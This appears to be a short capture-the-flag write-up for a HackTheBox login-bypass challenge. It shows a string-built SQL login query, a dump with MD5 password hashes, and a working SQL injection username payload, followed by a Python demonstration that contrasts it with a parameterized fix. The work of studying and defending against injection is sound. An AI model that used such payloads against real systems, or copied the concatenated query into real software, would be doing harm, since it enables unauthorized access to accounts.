###### tags: `HackTheBox` `round 2`
# CyberSanta Toy Management
```
The evil elves have changed the admin access to Santa's Toy Management Portal. Can you get the access back and save the Christmas?
```
## MD5 hashes and flag stored in the DB
SQL injection?

The verification query looks like this:
```
let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`;
```

Data from the database dump:
```
INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES
(1, 'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),
(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),
(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),
(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),
(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),
(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),
(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);
-- --------------------------------------------------------
INSERT INTO `users` (`id`, `username`, `password`) VALUES
(1, 'manager', '69bbdcd1f9feab7842f3a1c152062407'),
(2, 'admin', '592c094d5574fb32fe9d4cce27240588');
```
## Solution


## Action
```
Works: "username: admin' or '1=1''"
```
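
Why the noted input gets past the check, and what the fixed query looks like: this is an added example, not part of the original write-up or the challenge source. It assumes an in-memory SQLite database as a stand-in for the challenge's database, loaded with the `users` rows from the dump above; the function names are hypothetical.

```python
import sqlite3


def make_db():
    """Constructed fixture: the users rows from the dump, in in-memory SQLite
    (assumption: a stand-in for the challenge's real database)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "manager", "69bbdcd1f9feab7842f3a1c152062407"),
            (2, "admin", "592c094d5574fb32fe9d4cce27240588"),
        ],
    )
    return db


def login_concat(db, user, password):
    """Same construction as the page's template literal: input becomes SQL text."""
    stmt = (
        "SELECT username FROM users "
        f"WHERE username = '{user}' and password = '{password}'"
    )
    return [row[0] for row in db.execute(stmt)]


def login_param(db, user, password):
    """Hardened form: placeholders keep both values as data, never as SQL."""
    stmt = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(stmt, (user, password))]


if __name__ == "__main__":
    db = make_db()
    noted_input = "admin' or '1=1''"  # the username value recorded in the note
    # The quote ends the username literal early. AND binds tighter than OR, so
    # the password comparison no longer gates the username = 'admin' branch.
    print("concatenated :", login_concat(db, noted_input, "wrong"))
    print("parameterized:", login_param(db, noted_input, "wrong"))
    # A genuine match still works; the stored column value is compared as-is.
    print("valid login  :",
          login_param(db, "manager", "69bbdcd1f9feab7842f3a1c152062407"))
```

With placeholders the whole input is compared against the `username` column as one string, so no row matches and the login is rejected.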